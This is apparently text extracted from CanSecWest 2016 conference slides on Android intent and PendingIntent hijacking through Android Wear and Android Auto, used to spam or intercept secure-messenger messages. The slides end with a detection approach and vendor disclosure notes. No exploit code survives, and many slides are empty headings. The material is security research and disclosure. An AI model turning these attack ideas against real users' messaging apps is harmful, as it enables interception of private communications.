Having fun with secure messengers and Android Wear (and Android Auto)
Artem Chaykin
Positive Technologies
CanSecWest’16
Who I am? • Russian hacker / Putin’s agent • Mobile application security team lead • SCADA Strangelove Team • RDot.Org team member
Android IPC basics • Private memory for each process • Data is passed through kernel module – Binder • Intent-based
Intents • Intent is an object • App1 can send intents to exported components of App2
Intent
Packagename
Componentname
Ac0on Data
PendingIntent
Intent
Iden/ty Permissions
• getActivity() • getService() • getBroadcast()
PendingIntent
• AlarmManager • NotificationManager • Identity confirmation
Example 0x2 – PendingIntent hijacking
• 3rd party push services • Identity confirmation
Victims:
Android Wear & Android Auto • Remote Input class is based on PendingIntent
Android Wear & Android Auto • Remote Input class is based on PendingIntent
Android Wear & Android Auto
Android Wear & Android Auto
Android Wear & Android Auto
Voicereply
Example 0x3: Spam Victim:
• Bug:
Example 0x3: Spam Victim:
• Bug:
Example 0x3: Spam Victim:
• Exploit:
Example 0x3: Spam Victim:
• Result:
Example 0x3: Spam • Victims:
Example 0x3: Intercepting Victim: • Bug:
Example 0x3: Intercepting Victim: • Exploit:
Example 0x3: Intercepting
• Android Auto victims:
• Android Wear victims:
Detecting with Xposed module
Fixes Still no thanks
• Signal – emailed Moxie – fixed same day – got “thanks” • Telegram – emailed security@ - partial fix after ~ 45 days -